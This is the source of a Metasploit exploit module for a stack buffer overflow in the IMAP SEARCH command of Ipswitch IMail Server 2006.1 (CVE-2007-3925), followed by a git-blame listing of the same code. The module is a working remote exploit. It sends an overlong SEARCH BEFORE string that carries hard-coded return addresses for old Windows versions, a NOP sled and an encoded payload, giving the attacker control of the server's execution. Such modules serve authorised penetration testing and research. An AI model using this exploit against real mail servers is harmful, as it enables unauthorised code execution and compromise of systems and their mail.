modules/exploits/windows/imap/ipswitch_search.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Imap

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH
        verb. By sending an overly long string, an attacker can overwrite the
        buffer and control program execution.
        In order for this module to be successful, the IMAP user must have at least one
        message.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-3925' ],
          [ 'OSVDB', '36219' ],
          [ 'BID', '24962' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 Pro SP4 English',   { 'Ret' => 0x77f81be3 } ],
          [ 'Windows 2003 SP0 English',       { 'Ret' => 0x77c5cee8 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 18 2007'))
  end

  def exploit

    sploit =  "a002 SEARCH BEFORE " + "<" + rand_text_english(87)
    sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">"

    info = connect_login

    if (info == true)
      print_status("Trying target #{target.name}...")
      sock.put("a001 SELECT INBOX\r\n")
      sock.get_once(-1, 3)
      sock.put(sploit + "\r\n")
    else
      print_status("Not falling through with exploit")
    end

    handler
    disconnect

  end
end
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = AverageRanking`
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::Imap`
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH`
			`verb. By sending an overly long string, an attacker can overwrite the`
			`buffer and control program execution.`
			`In order for this module to be successful, the IMAP user must have at least one`
			`message.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2007-3925' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '36219' ],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'BID', '24962' ],`
			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 400,`
			`'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",`
			`'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ],`
			`[ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Jul 18 2007'))`
			`end`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87)`
			`sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">"`
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`info = connect_login`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`if (info == true)`
			`print_status("Trying target #{target.name}...")`
			`sock.put("a001 SELECT INBOX\r\n")`
			`sock.get_once(-1, 3)`
			`sock.put(sploit + "\r\n")`
			`else`
			`print_status("Not falling through with exploit")`
			`end`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`handler`
			`disconnect`
added exploit module ipswitch_search.rb 2007-07-29 14:38:47 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`